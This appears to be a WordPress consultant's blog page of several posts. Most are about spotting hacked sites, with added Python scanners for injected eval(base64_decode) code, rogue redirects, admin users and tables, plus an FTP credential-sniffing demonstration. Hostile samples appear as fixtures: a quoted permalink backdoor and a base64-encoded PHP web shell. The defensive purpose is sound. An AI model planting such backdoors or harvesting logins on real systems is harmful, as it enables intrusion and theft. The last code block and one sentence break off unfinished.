Neil Matthews

Category: General Blogging

  • 10 Signs You Have Been Hacked

    I’ve been fixing an awful lot of hacked sites over the past few weeks, and many site owners do not know they have been hacked until someone tells them. Do yourself a favour: check over the items below and make sure your site is okay.

    Look Inside Your WordPress Code Files

    Fire up your favourite FTP client and open a few of the PHP files in your site root, and in wp-content/themes and wp-content/plugins. Look for weird-looking code statements like this.

    eval(base64_decode("A LOAD OF BASE64-ENCODED CODE GOES HERE"));

    An even better method is to download the whole site and search every file from your PC or Mac for eval(base64_decode. The base64 string is only an encoding, not encryption: decode it and you can read exactly what the eval() would have run. This is the most common hack I am seeing.
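    The search described above, done in code. This is an added example of my own, not code from the original post: it walks a copy of the site downloaded to your PC or Mac, flags each eval() that wraps base64_decode() (with or without gzinflate() in between), and decodes the payload so you can read what it would have run. The three files it scans are constructed by build_sample_site() for the demonstration; the two infected ones carry a harmless echo and a system() call as payloads.

```python
"""Scan a downloaded site copy for eval(base64_decode(...)) injections (added example)."""
import base64
import binascii
import os
import re
import tempfile
import zlib

# eval() around base64_decode(), optionally with gzinflate() in between.
# Quotes may be ASCII or typographic, as happens when a snippet is pasted
# through a blog editor, so both are accepted.
INJECTION_RE = re.compile(
    r"eval\s*\(\s*(?P<inflate>gzinflate\s*\(\s*)?base64_decode\s*\(\s*"
    r"[\"'\u201c\u201d](?P<payload>[A-Za-z0-9+/=\s]*)[\"'\u201c\u201d]",
    re.IGNORECASE,
)


def decode_payload(payload, inflate=False):
    """Return the PHP the eval() would run, or a note if the payload is not valid base64."""
    try:
        raw = base64.b64decode(re.sub(r"\s+", "", payload), validate=True)
        if inflate:
            raw = zlib.decompress(raw, -15)  # PHP gzinflate() is raw DEFLATE
    except (binascii.Error, ValueError, zlib.error) as exc:
        return "<undecodable: %s>" % exc
    return raw.decode("utf-8", errors="replace")


def scan_text(text):
    """Return one finding per eval(base64_decode(...)) in a file's contents."""
    findings = []
    for m in INJECTION_RE.finditer(text):
        inflate = m.group("inflate") is not None
        findings.append({
            "line": text.count("\n", 0, m.start()) + 1,
            "inflated": inflate,
            "preview": decode_payload(m.group("payload"), inflate)[:120],
        })
    return findings


def scan_tree(root):
    """Walk the site copy and return findings tagged with their relative path."""
    results = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "r", encoding="utf-8", errors="ignore") as fh:
                text = fh.read()
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            for finding in scan_text(text):
                finding["path"] = rel
                results.append(finding)
    return results


def build_sample_site(root):
    """Write a constructed three-file site: one clean file, two infected ones."""
    payload = base64.b64encode(b'<?php echo "pwned"; ?>').decode()
    deflater = zlib.compressobj(wbits=-15)
    deflated = deflater.compress(b'<?php system($_GET["c"]); ?>') + deflater.flush()
    packed = base64.b64encode(deflated).decode()
    files = {
        "wp-config.php": "<?php\ndefine('DB_NAME', 'wp');\n",
        "wp-content/themes/demo/functions.php":
            "<?php\nadd_action('init', 'demo_setup');\n"
            "eval(base64_decode(\u201c%s\u201d));\n" % payload,
        "wp-content/uploads/cache.php":
            "<?php eval(gzinflate(base64_decode('%s'))); ?>" % packed,
    }
    for rel, body in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)


def demo():
    """Build the constructed site in a temporary directory and scan it."""
    site = tempfile.mkdtemp()
    build_sample_site(site)
    return scan_tree(site)


if __name__ == "__main__":
    for f in demo():
        print("%s:%d inflated=%s %r" % (f["path"], f["line"], f["inflated"], f["preview"]))
```

    Point scan_tree() at the folder your FTP client downloaded into. A hit in wp-content/uploads is almost always malicious, because nothing legitimate puts PHP there; a hit in a theme or plugin file needs a look at the decoded preview, since a few obfuscated commercial themes use the same construct.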

    UPDATE November 2012 

    Feel free to read the whole post, but I recently started working with a hack recovery specialist.

    I’ve been working with Sucri.net on a number of hacked WordPress sites for my clients.  At $80, their hack recovery and security monitoring package is absolutely excellent; get them on the case for a fast hack recovery.

    Sucri.net

    Check Out Your Permalink

    Another hack method I have seen is to append some code to the end of the permalink structure.

    Go to Settings -> Permalinks and ensure nothing has been tacked onto the end.  This is what I saw:

    %postname%/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/

    A valid permalink structure is something like /%postname%/, built only from the %tag% placeholders WordPress provides.  The injected version above is a backdoor: the eval() is meant to run whatever base64-encoded PHP the attacker sends in an HTTP request header named ExecCode ($_SERVER[HTTP_EXECCODE] is how PHP exposes that header), so the attacker can run code on the server just by making a request.
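    A check for the permalink structure, as an added example of my own rather than anything from the original post. It tokenises the structure into %tag% placeholders and literal path text, allows only the placeholders WordPress itself substitutes, and reports anything else, which is what a browser-tampered or database-edited value like the one above looks like. The header_name() helper shows which request header a $_SERVER[HTTP_*] key corresponds to, so you know what to look for.

```python
"""Audit a WordPress permalink structure for injected code (added example)."""
import re

# The only placeholders WordPress substitutes in a permalink structure.
# If you registered custom taxonomies with rewrite tags, add them here.
KNOWN_TAGS = {
    "%year%", "%monthnum%", "%day%", "%hour%", "%minute%", "%second%",
    "%post_id%", "%postname%", "%category%", "%author%",
}
# A structure is a sequence of %tag% placeholders and literal path text.
TOKEN_RE = re.compile(r"%[a-z_]+%|[^%]+|%")
LITERAL_OK = re.compile(r"[A-Za-z0-9/._-]+")


def audit_permalink(structure):
    """Return a list of problems; an empty list means the structure looks sane."""
    problems = []
    if structure == "":
        return problems  # "Plain" permalinks (?p=123): nothing to inspect
    if not structure.startswith("/"):
        problems.append("structure does not start with '/'")
    for token in TOKEN_RE.findall(structure):
        if len(token) > 1 and token.startswith("%") and token.endswith("%"):
            if token not in KNOWN_TAGS:
                problems.append("unknown tag %s" % token)
        elif token == "%":
            problems.append("unbalanced '%'")
        elif not LITERAL_OK.fullmatch(token):
            problems.append("unexpected characters in %r" % token)
    return problems


def header_name(server_key):
    """Which request header a $_SERVER[HTTP_*] key reads, e.g. HTTP_EXECCODE -> Execcode."""
    return server_key[len("HTTP_"):].replace("_", "-").title()


# The structure quoted in the post, kept here as the sample input.
INJECTED = "%postname%/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/"

if __name__ == "__main__":
    for s in ("/%postname%/", "/%year%/%monthnum%/%postname%/", INJECTED):
        print(s, "->", audit_permalink(s) or "OK")
    print(header_name("HTTP_EXECCODE"))
```

    The value to feed it is the permalink_structure row in wp_options, or the field on the Permalinks screen; checking the database directly sidesteps any plugin that might be hiding the value from the dashboard.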

    .htaccess

    One site had been hacked by editing the .htaccess file to add a 301 redirect to a Viagra site.  Have a look in your .htaccess file.  HINT: the leading period/full stop marks the file as hidden, so make sure your FTP client is set to show hidden files.

    A healthy .htaccess for WordPress should look like this.

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    # END WordPress

    wp-config.php

    Another site was hacked by adding the following entries to wp-config.php to redirect it.  Constants defined here override the Site Address and WordPress Address stored in the database, and the fields on Settings -> General become read-only, so check the file itself rather than the dashboard:

    define('WP_SITEURL', 'malicious URL');
    define('WP_HOME', 'malicious URL');
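    Both checks in one script, as an added example of my own and not code from the original post. It compares .htaccess against the stock WordPress block shown above and classifies every extra line (a redirect to another host, any other redirect, or simply something non-stock to read), and it parses wp-config.php for WP_HOME/WP_SITEURL defines that point away from your domain. The two hacked files are constructed samples, and example.com stands in for your own host.

```python
"""Audit .htaccess and wp-config.php for injected redirects (added example)."""
import re
from urllib.parse import urlparse

# The stock rewrite block WordPress writes; anything beyond it deserves a look.
STOCK_HTACCESS = """# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress"""

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
DEFINE_RE = re.compile(
    r"define\s*\(\s*['\"](WP_HOME|WP_SITEURL)['\"]\s*,\s*['\"]([^'\"]*)['\"]"
)


def _directives(text):
    """Non-blank, non-comment lines with surrounding whitespace removed."""
    return [ln.strip() for ln in text.splitlines()
            if ln.strip() and not ln.strip().startswith("#")]


def audit_htaccess(text, own_host):
    """Classify every line that is not part of the stock WordPress block."""
    stock = set(_directives(STOCK_HTACCESS))
    findings = []
    for line in _directives(text):
        if line in stock:
            continue
        directive = line.split()[0].lower()
        offsite = [u for u in URL_RE.findall(line)
                   if (urlparse(u).hostname or "") != own_host]
        if offsite:
            findings.append(("redirect-offsite", line))
        elif directive.startswith("redirect") or "[R" in line:
            findings.append(("redirect", line))
        else:
            findings.append(("non-stock", line))
    return findings


def audit_wp_config(text, own_host):
    """Return (constant, value) for WP_HOME/WP_SITEURL defines that point elsewhere."""
    findings = []
    for name, value in DEFINE_RE.findall(text):
        if (urlparse(value).hostname or "") != own_host:
            findings.append((name, value))
    return findings


# Constructed samples; pills.example.net plays the part of the pharma site.
HACKED_HTACCESS = STOCK_HTACCESS + """
RewriteCond %{HTTP_REFERER} (google|bing)\\. [NC]
RewriteRule .* http://pills.example.net/ [R=301,L]
"""
HACKED_WP_CONFIG = """<?php
define('DB_NAME', 'wp');
define('WP_SITEURL', 'http://pills.example.net');
define('WP_HOME', 'http://pills.example.net');
"""

if __name__ == "__main__":
    for kind, line in audit_htaccess(HACKED_HTACCESS, "example.com"):
        print(".htaccess", kind, line)
    for name, value in audit_wp_config(HACKED_WP_CONFIG, "example.com"):
        print("wp-config.php", name, "->", value)
```

    The constructed .htaccess sample redirects only visitors whose referer is a search engine, which is why the owner, typing the address in directly, never sees the redirect; the RewriteCond line is reported as non-stock and the RewriteRule as an off-site redirect. Caching and security plugins write legitimate extra blocks, so expect some non-stock lines and read them rather than deleting blindly.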

    Spurious Redirections From Your Home Page

    Check your home page; many blog owners rarely visit the home page of their own site.  Make sure it is not redirecting to a malware site.  Try it from a browser where you are not logged in and by clicking through from a search result: some redirects only fire for visitors arriving from Google, so the owner never sees them.

    Weird Content

    The high-profile hack of Chris Brogan’s site saw weird ads appear on his pages; check over your site to make sure there are no banner ads you did not place.

    Google Site View

    Do a search for your site on Google by typing in:

    site:mydomain.com

    This will show how Google sees your site.  Certain hacks change your page titles and descriptions to advertise Viagra and other recreational pharmaceuticals, often only in the copy served to search engine crawlers, so the search results can show it when a normal visit does not; check out http://www.pearsonified.com/2010/04/wordpress-pharma-hack.php

    Google will also mark your site as “containing malware” if you have been hacked and you are hosting

    Searches Leading To Your Site

    Check out which searches are bringing people to your site; if "viagra" is bringing people to your site as a keyword, something is up.  If you use WordPress.com Stats, that can give you a heads up.

    Unusual Admin Users

    Go to your Users section and look for weird admin-level users.  Common ones I have seen are wordpress.org and system.

    If you don’t recognise these users, delete them, then change the passwords of the accounts you do recognise.

    Weird Database Tables

    I’m not trying to make you paranoid, but you may want to inspect your database tables too.  I saw one hack attack which had created a rogue table full of malware.  The table was called wp_pagemeta; it looks like a proper table by masquerading as a cousin of the real table wp_postmeta.  Have a look at your tables: can you account for them all?  Remember that plugins and themes can create their own tables too.
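    The admin-user check and the table inventory, asked of the database directly rather than the dashboard. This is an added example of my own, not the original post's; it uses an in-memory sqlite3 stand-in, constructed here with the same column names as the MySQL wp_users and wp_usermeta tables, so it runs without a WordPress install. An administrator is anyone whose wp_capabilities meta (a PHP-serialized array) grants the administrator role, whatever the Users screen shows; the table check reports anything with the wp_ prefix that is neither a core table nor one you know a plugin created. The wp_backup_log plugin table is a made-up name for the demonstration.

```python
"""List administrators and unexpected tables straight from the database (added example)."""
import re
import sqlite3

# Core WordPress tables (wp_termmeta since 4.4). Prefix assumed to be wp_.
CORE_TABLES = {
    "wp_commentmeta", "wp_comments", "wp_links", "wp_options", "wp_postmeta",
    "wp_posts", "wp_term_relationships", "wp_term_taxonomy", "wp_termmeta",
    "wp_terms", "wp_usermeta", "wp_users",
}
# wp_capabilities is PHP-serialized, e.g. a:1:{s:13:"administrator";b:1;}
ADMIN_RE = re.compile(r's:13:"administrator";b:1;')


def find_admins(conn):
    """Logins of every user whose capabilities grant the administrator role."""
    rows = conn.execute(
        "SELECT u.user_login, u.user_email, m.meta_value "
        "FROM wp_users u JOIN wp_usermeta m ON m.user_id = u.ID "
        "WHERE m.meta_key = 'wp_capabilities'"
    )
    return sorted(login for login, _email, caps in rows if ADMIN_RE.search(caps))


def unexpected_tables(conn, known_plugin_tables=()):
    """wp_-prefixed tables that are neither core nor on your list of plugin tables."""
    names = {r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'")}
    expected = CORE_TABLES | set(known_plugin_tables)
    return sorted(n for n in names if n.startswith("wp_") and n not in expected)


def build_sample_db():
    """Constructed stand-in for the MySQL database: core tables plus two extras."""
    conn = sqlite3.connect(":memory:")
    for table in CORE_TABLES | {"wp_pagemeta", "wp_backup_log"}:
        if table not in ("wp_users", "wp_usermeta"):
            conn.execute("CREATE TABLE %s (id INTEGER PRIMARY KEY)" % table)
    conn.execute("CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, "
                 "user_login TEXT, user_email TEXT)")
    conn.execute("CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, "
                 "user_id INTEGER, meta_key TEXT, meta_value TEXT)")
    conn.executemany("INSERT INTO wp_users VALUES (?, ?, ?)", [
        (1, "neil", "neil@example.com"),
        (2, "editor", "ed@example.com"),
        (3, "wordpress.org", "x@example.net"),  # the kind of login name the post warns about
    ])
    conn.executemany(
        "INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)", [
            (1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
            (2, "wp_capabilities", 'a:1:{s:6:"editor";b:1;}'),
            (3, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
        ])
    return conn


if __name__ == "__main__":
    db = build_sample_db()
    print("admins:", find_admins(db))
    print("unexpected tables:", unexpected_tables(db, known_plugin_tables=["wp_backup_log"]))
```

    Against a real site the two SELECTs run unchanged in phpMyAdmin or the mysql client, except that the table list comes from SHOW TABLES rather than sqlite_master; if your installation uses a prefix other than wp_, substitute it in the table names and in the wp_capabilities meta key, which carries the prefix too.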

    It’s Not Personal

    Most hacked sites are just black-hat SEO scam artists trying to increase their ranking.  It’s not personal, so don’t panic if you find you have been hacked.  Don’t take it personally, they are not out to getcha.  Give me a call if you find an issue.

    It can be repaired.  Let me know in the comments if you would like some blog posts on cleaning up a hacked site.

    Need More Help Fixing Your Hacked Site?

    I’ve created a WordPress Hack Recovery Course.

    Photo credit Kapa Haka

  • PremiumHeadwaySkins.com

    I’m very pleased to announce that a new joint venture between myself and Jonathan and Lea Woodward, of Kinetiva and Location Independent fame, has been launched: our new site PremiumHeadwaySkins.com is now live.

    What Is Premium Headway Skins

    This is our new site to promote and sell skins for the Headway WordPress theme.  Jonathan, Ace Designer in Chief, crafted the sites, and I, as Admiral Top Techie, coded them.

    It’s a great match of skills, I cannot design for toffee, but I am pretty good at all that coding stuff.

    What Is A Skin

    A skin is a custom design which sits on top of the Headway theme.

    Why Do I Need A Skin

    The trouble with the excellent framework themes such as Headway and Thesis is that unless you have a certain level of coding skill, your site can look like any number of other sites.  A skin takes the hard work of coding up a custom theme and packages it in a simple-to-use format.

    You get a unique design plus the excellent features of the framework theme.

    Our Skins

    We have gone live with two skins, with a third in production.  The first is designed for people selling professional services, we have two colour versions and some very slick design elements.

    The second is a single-page sales letter for people selling digital products.  We have designs for membership sites, ebooks and audio products in three colour schemes.

    Get A Skin Today

    Please visit our site and let us know what you think. PremiumHeadwaySkins.com

  • Introducing Premium Headway Leafs

    A quick post for all of you using the excellent Headway theme.  If you don’t use Headway, sorry for the interruption.

    PremiumHeadwayLeafs.com

    I have just launched a new site to promote my Headway Leafs over at premiumheadwayleafs.com

    What Is A Leaf

    A Leaf is a content component which you can place on your pages using the visual editor.  Think of leafs as widgets on steroids: they can be placed anywhere in your design, not just in a sidebar.

    My Leaves

    The leaves I have developed are:

    • Yet Another YouTube Leaf – this allows you to easily add and customise YouTube videos on your site
    • Authorised Users – this leaf allows you to control the content seen by site visitors depending upon whether they are logged on
    • Amazon S3 Secure Link – This allows you to create a secure link to content stored on your Amazon S3 configuration

    Skins Coming Soon

    Stay tuned next week for an announcement on a Headway Skins project I have been working on.

  • When Too Many Blog Comments Are Bad

    A lot of bloggers get very hung up about the number of comments they get.  Many writers are very insecure about their low comment count; they think that a huge number of comments is a validation of their writing, yours truly included.

    I want to share a story with you about a client of mine with the exact opposite problem, he had too many comments and it was causing real problems with his site.

    The Site with 500K + comments

    Let me just say that again: this site had more than half a million legitimate comments, not spam, not "great post, thumbs up", but honest, really valuable comments discussing the content.  To put that into perspective, A-list blogger Darren Rowse at Problogger.net recently stated that he has 178K comments; we say pah to paltry levels like that.

    When Comments Kill

    The comments came in a huge rush because of the time sensitive nature of the blog posts, and this in turn overloaded the database and caused the whole site to crash.

    I was called in to  performance tune the site and stop the site crashing under the load of comments.

    Controlling Comments

    It may be that you are overwhelmed by comments, with too many to reply to, or you are being inundated with spam.  The rest of this post gives you some ideas to control your comments; you may not have half a million, but you can still have too many.  Here are some of the techniques I used with the inundated site.

    Close Comments

    Controversial, I know, but why not just close your comments if you have become overwhelmed?  Let your readers know the reason: say you cannot keep up with comment moderation and it is impacting the quality of the content you are producing.  A number of successful bloggers have gone this route.

    I find I am getting more feedback from Twitter nowadays; it may be that comments have had their day anyway (but that’s for another post).

    Add Anti-Spam protection

    It may seem an obvious point, but I still see sites without anti-comment-spam protection.  My favourite tool for this is Akismet, see http://akismet.com/

    Install an anti-spam plugin and keep the rubbish out of your comment moderation queue.

    Close Older Comments

    There is an option in your discussion settings (Settings -> Discussion) to close comments on posts that are over x days old.  If your content is time sensitive, why not consider this route?

    Selectively Close Comments

    If you scroll down to the discussion section of the post editor, there is an option to disable comments on an individual post.  If you don’t want to handle comments on a post, disable them and only keep comments open on your key posts.

    Require Authentication

    Add a little friction to the commenting process by requiring authentication: if people need to register on your site and then log in, they are less likely to comment unless they are determined to.

    Off Load Your Comments

    If comments are causing a large load on your server and impacting performance, why not consider offloading comments to someone else’s server?

    Intense Debate is a commenting platform owned by Automattic (the company behind WordPress.com) which allows you to host your comments on their system.  Let them take the performance hit for you.

    http://intensedebate.com/

    Moderate Ruthlessly

    Junk everything that does not add value to your content, and let your reader know that, whilst you appreciate a great post thumbs up, you will not be publishing their comment unless it adds value to the post in question.

    This will have an initial moderation overhead but once your readers get the message you will hopefully see less low quality comments and reduce your moderation admin job.

    Code up Comment Flood Protection

    In the end I coded up a custom solution for my client: I edited one of the comment-add scripts to add a delay function, so five seconds have to pass before the next comment can be added.  This is used to control the flow of comments and stop the backend database from being overloaded.
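    The five-second rule, as an added example of my own rather than the script the author modified. It enforces a minimum gap between comments from the same source (keyed on the commenter's IP address here; WordPress core's own check_comment_flood_db() applies a fixed window keyed on IP or e-mail) and adds a site-wide cap on comments per second, which is what actually protects the database when a post goes viral. The clock is injected so the logic can be exercised without sleeping, and the burst of events at the bottom is constructed. In WordPress the natural place to call check() is a preprocess_comment filter, before the comment is inserted.

```python
"""Comment flood throttle with an injectable clock (added example)."""
import time
from collections import deque


class CommentThrottle:
    """Reject a comment if its source posted less than min_gap seconds ago, or if the
    site as a whole has already accepted global_limit comments in the last window."""

    def __init__(self, min_gap=5.0, global_limit=50, window=1.0, clock=time.monotonic):
        self.min_gap = min_gap
        self.global_limit = global_limit
        self.window = window
        self.clock = clock
        self.last_seen = {}      # source key -> time of its last accepted comment
        self.recent = deque()    # times of all accepted comments inside the window

    def check(self, source):
        """Return (allowed, reason). Call before the INSERT into the comments table."""
        now = self.clock()
        while self.recent and now - self.recent[0] >= self.window:
            self.recent.popleft()
        if len(self.recent) >= self.global_limit:
            return False, "site-wide limit of %d comments per %gs reached" % (
                self.global_limit, self.window)
        last = self.last_seen.get(source)
        if last is not None and now - last < self.min_gap:
            return False, "wait %.1fs before commenting again" % (self.min_gap - (now - last))
        self.last_seen[source] = now
        self.recent.append(now)
        if len(self.last_seen) > 10000:  # keep memory bounded on a busy site
            self.last_seen = {k: t for k, t in self.last_seen.items()
                              if now - t < self.min_gap}
        return True, "accepted"


def replay(events, **kwargs):
    """Run (time, source) events through a throttle; return the decision for each."""
    current = {"t": 0.0}
    throttle = CommentThrottle(clock=lambda: current["t"], **kwargs)
    decisions = []
    for t, source in events:
        current["t"] = t
        decisions.append(throttle.check(source)[0])
    return decisions


# Constructed burst: one visitor double-posting, then a surge from many addresses.
SAMPLE_EVENTS = [
    (0.0, "10.0.0.1"), (1.0, "10.0.0.1"), (5.0, "10.0.0.1"),
    (5.1, "10.0.0.2"), (5.2, "10.0.0.3"), (5.3, "10.0.0.4"), (6.3, "10.0.0.5"),
]

if __name__ == "__main__":
    print(replay(SAMPLE_EVENTS, min_gap=5.0, global_limit=3, window=1.0))
```

    Keying on IP alone will throttle everyone behind one corporate proxy together, which is why core also looks at the e-mail address; the site-wide cap is the one that saves the database, since a flood from thousands of distinct addresses passes the per-source rule untouched. Send a 429 or the WordPress "posting too quickly" error to the rejected client, and keep the state in the object cache if you run more than one web server.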

    Comments Causing Concern?

    Check out a couple of these ideas to see if you can ease a problem most bloggers would kill for.

  • How To Link A Series Of Blog Posts

    Writing a series of blog posts is a great way to create anticipation with your readers and make your blog more sticky, that is, more likely that readers will come back.

    If you can develop a compelling series of blog posts which you drip feed to your audience, they will be hanging on every word, looking forward to the next installment and possibly subscribing to your feed.

    It is also a great way to break down a big topic into more manageable chunks so that:

    1) it is less daunting to write

    2) It is more palatable for your readers to consume in small chunks.

    One problem with writing a series of posts is that you need to link to the other posts in the collection, and this can be a little fiddly to update and keep all these links in order.

    Enter The Plugin

    Never fear in-series is here.

    The plugin I like to use for this task is in-series: http://wordpress.org/extend/plugins/in-series/ This is a tiny little plugin, but it does the job very well.

    What Does It Do?

    In-series puts a table of contents at the top of every post you mark as part of a series, and it automatically updates the posts with links when you add a new post.

    It also adds a link at the bottom of your posts with pointers to the next or previous post in the series.

    You can see it in action on my series about backup and recovery https://dev.neilmatthews.com/backup-recovery-introduction

    How Does it work?

    A little widget is added to the edit posts page, near the bottom, using this you can create a new series, or add a post to the start or the end of the series.

    The only downside of this plugin is the way you need to bubble posts up or down if you add them to the series in the wrong order, but this is still easier than changing a load of links in several posts.

    Small Plugins Save Loads of Work

    The tiny footprint and unassuming interface of the plugin mask some brilliant functionality.  If you are planning a series of posts, check out in-series to save yourself quite a bit of work updating your links.

  • Survey: How To Create a Custom Theme?

    I would appreciate a couple of minutes of your time to complete this survey about creating custom themes.

    I am considering a group coaching project to take a number of people through the process of creating a custom theme for their WordPress site.  I want to judge the need for this project.

    My idea is to step through the design process, and to take that design and make it a complete custom design building upon the headway theme framework on my development server.  The last part of this process is to export the new custom theme to your live site.

    The process will be group coaching sessions with me (and maybe some others) and access to a development area on my site to build your custom theme in a safe location where you cannot impact your live site.  I will make myself available to support your development throughout the process, so at the end of the sessions you have your own custom-designed blog theme.

    My current thinking is a six week process of coaching and development.  My rough outline of the  sessions will be:

    1. Design Process
    2. Introduction to headway
    3. Implementing Your Design
    4. Custom CSS Coding – introduction
    5. Custom CSS Coding – the next level
    6. Testing your theme and making it live

    Please complete the survey below and let me know what you think.

    [gravityform id=13 ]

  • Group Coaching: Integrating WP and Twitter

    I am opening up registration for a group coaching session I think may be useful to WordPress site owners.

    Integrating WordPress And Twitter

    The session I have been planning is a live webinar taking  you through integrating your WordPress site with twitter.

    The session will show the mechanics of integrating your blog with Twitter, how to find readers for your site on twitter and how to promote your content on twitter.

    Agenda

    Here is the agenda for the session

    • How to link WordPress to twitter, plugins and themes
    • Promoting your posts on twitter
    • Finding readers for your blog on Twitter
    • Using Twitter to find ideas for blog posts
    • Your Twitter landing page
    • Your twitter background
    • Q & A Session

    How It Works

    The session will be conducted using GoToMeeting, an online meeting tool which will allow me to share my desktop with you.  I will give a presentation and demonstrate the techniques on my test Twitter account and WordPress site.

    The session will be recorded and made available to you for download, so you have a reference of our session.

    It is expected that the session will last for approximately one hour.

    How Much

    I will be charging $19.99 for this session.

    When

    I am planning to run this session on Tuesday 6th April, 11:00 – 12:00 PST, 14:00 – 15:00 EST and 19:00 – 20:00 UK time.

    Book Your Slot

    If you are interested in joining this session, please leave your details using the form below.

    Places are limited to 15 because of the version of GoToMeeting I use, so book early to avoid disappointment.

    [gravityform id=9 title=false description=false]

  • Use SFTP For Flip Sake

    If you do only ONE thing to secure your site, then please consult with your hosting provider and see if you can access your site to upload and download files via SFTP rather than FTP.

    What is SFTP

    SFTP stands for SSH File Transfer Protocol; it is a method of transferring files to and from your site over an encrypted SSH connection.  The link between your local machine and the remote hosting computer is encrypted, so anything intercepted on the way cannot be read and used to hack your site.

    Think about credit card transactions in a browser: you use the secure HTTP protocol, https, and you see a small lock logo which tells you your credit card details cannot be read in transit.  It is the same thing with SFTP at a file level.

    Why Is There A Problem with FTP

    Using FTP, all of your login information is sent "in the clear" to your site: your login ID and password travel over the internet as plain text that can be intercepted and read.  The files you upload and download travel the same way.

    It is a fairly easy task for hackers to "sniff" packets of data going across the internet in the clear; if they set up a filter looking for particular strings, for example the FTP USER and PASS commands, they can harvest login information and gain access to your site.
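    What that filter amounts to, as an added example of my own and not code from the original post. It reads a reconstructed FTP control-channel conversation (the kind of thing Wireshark's "Follow TCP Stream" on port 21 shows; the capture below is constructed, with C: for client lines and S: for server replies), pairs each USER with its PASS, and uses the server's reply code to tell working passwords from rejected ones. This is the whole of the attacker's job when the protocol is FTP.

```python
"""Harvest FTP logins from a captured control-channel conversation (added example)."""
import re

# Constructed capture of one FTP session, as a sniffer on the path would see it.
CAPTURE = """\
S: 220 (vsFTPd 3.0.3)
C: USER neil
S: 331 Please specify the password.
C: PASS hunter2
S: 230 Login successful.
C: PWD
S: 257 "/" is the current directory
C: USER guest
S: 331 Please specify the password.
C: PASS letmein
S: 530 Login incorrect.
"""

LINE_RE = re.compile(r"^(?P<dir>[CS]): (?P<text>.*)$")


def harvest_ftp_logins(capture):
    """Return (user, password, login_succeeded) for every USER/PASS pair in the stream."""
    logins = []
    user = password = None
    for line in capture.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        direction, text = m.group("dir"), m.group("text")
        if direction == "C":
            verb, _, arg = text.partition(" ")
            if verb.upper() == "USER":
                user, password = arg, None
            elif verb.upper() == "PASS" and user is not None:
                password = arg
        elif password is not None and text[:3].isdigit():
            # The first reply after PASS says whether the password worked: 230 = logged in.
            logins.append((user, password, text.startswith("230")))
            user = password = None
    return logins


if __name__ == "__main__":
    for user, password, ok in harvest_ftp_logins(CAPTURE):
        print("%s / %s -> %s" % (user, password, "valid" if ok else "rejected"))
```

    Run the same script over an SFTP session's bytes and there is nothing to match: after the initial key exchange every line of the conversation, commands and file contents alike, is ciphertext.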

    How To Use SFTP

    Your first port of call will be your hosting provider.  Check out their documentation to see if you can switch from FTP to SFTP; it is a very poor company that does not care enough about its customers’ security to provide this small courtesy.

    How you change from FTP to SFTP will depend upon the client you use.  I like FileZilla, and all I need to do is prefix the host name with sftp://; please check the documentation of the tool you use.

    When you connect for the first time your client will ask you to accept the remote machine’s host key, which is used in the encryption process.  Do not just click accept: compare the fingerprint it shows with the one your hosting provider publishes.  If you accept a key from a machine sitting in the middle, that machine can decrypt everything you send and the encryption protects you from nobody.
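    How that comparison works, as an added example of my own and not code from the original post. An OpenSSH fingerprint is SHA256 over the raw key blob (the base64 part of a public key line), itself base64-encoded without padding; older clients show an MD5 fingerprint as colon-separated hex. The key below is constructed from dummy bytes purely so the arithmetic can run and is not a real key; the one you check is the line your client displays, against the fingerprint in your host's documentation.

```python
"""Check an SFTP/SSH host key against a published fingerprint (added example)."""
import base64
import hashlib
import hmac
import struct


def _ssh_string(data):
    """SSH wire-format string: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def parse_key_type(blob):
    """Read the algorithm name that every SSH public-key blob starts with."""
    (length,) = struct.unpack(">I", blob[:4])
    return blob[4:4 + length].decode("ascii")


def fingerprint_sha256(key_line):
    """OpenSSH 'SHA256:<unpadded base64>' fingerprint of a 'type base64 [comment]' line."""
    key_type, b64 = key_line.split()[:2]
    blob = base64.b64decode(b64)
    if parse_key_type(blob) != key_type:
        raise ValueError("key type on the line does not match the key blob")
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def fingerprint_md5(key_line):
    """Legacy colon-separated MD5 fingerprint, as older clients display it."""
    blob = base64.b64decode(key_line.split()[1])
    hexdigest = hashlib.md5(blob).hexdigest()
    return ":".join(hexdigest[i:i + 2] for i in range(0, 32, 2))


def host_key_matches(key_line, published):
    """True only if the key the client shows matches the fingerprint the host published."""
    published = published.strip()
    if published.startswith("SHA256:"):
        return hmac.compare_digest(fingerprint_sha256(key_line), published)
    return hmac.compare_digest(fingerprint_md5(key_line), published.lower())


def constructed_key_line():
    """A syntactically valid ssh-ed25519 line built from dummy bytes. NOT a real key."""
    blob = _ssh_string(b"ssh-ed25519") + _ssh_string(b"\x42" * 32)
    return "ssh-ed25519 " + base64.b64encode(blob).decode() + " demo (constructed)"


def tampered_copy(key_line):
    """Flip one bit of the key material, standing in for an impostor's key (demo helper)."""
    key_type, b64 = key_line.split()[:2]
    blob = bytearray(base64.b64decode(b64))
    blob[-1] ^= 0x01
    return key_type + " " + base64.b64encode(bytes(blob)).decode()


if __name__ == "__main__":
    line = constructed_key_line()
    published = fingerprint_sha256(line)   # what your host's documentation would list
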